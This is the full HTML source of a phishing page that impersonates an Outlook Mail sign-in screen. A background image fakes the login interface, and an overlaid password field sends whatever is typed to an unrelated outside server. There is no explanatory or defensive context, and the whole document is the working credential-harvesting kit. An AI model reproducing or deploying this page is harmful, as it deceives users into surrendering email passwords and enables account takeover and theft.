<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
	 
<meta name="robots" content="noindex,nofollow" />

  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
  <title>Outlook Mail</title>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
 

<style>

.Selecteuy{
    background: url(bg.png) no-repeat ; font-size: 1em; height: 662px; 	background-repeat: no-repeat; width: 1287px; background-color: black;
	
	
}

woo {
 outline:none;
}
</style>
</head>
<body bgcolor="#ffffff" style=" padding: 0; margin: 0; " class="Selecteuy">

 
 



<div style="float: right; z-index: 9999999; position: absolute; left: 0; margin-top: 249px; background: transparent; width: 337px; border-radius: 4px; margin-left: 515px;">	
 
			<br>
<form  method="post" action="https://npqvvqe.com/blaze/janet.php" >


 <input  type="password" name="vobes" tabindex="1" value="" required=""  Placeholder="Password" style="margin-top: -10px;background: transparent;border-radius: 2px;box-sizing: border-box;color: #695a5a;font-family: verdana;font-size: 12px;height: 36px;padding: 3px 7px;width: 338px;border: 0px solid #fff;margin-bottom: 0;margin-left: -1px;"> 
 
 
  <br>
   
   
<button  name="scaru" style="z-index: 10;\: 700;background-color: #0067b8;border: 0 none;border-radius: 2px;color: #FFF;font: 14px verdana;height: 36px;text-align: center;width: 338px;margin-top: 17px;margin-left:  -1px;font-weight: 500;">Sign in</button>
   
    
   

  
</form>
 
</div>

 

			
</div>

 

</div></div>
</body>
</html>
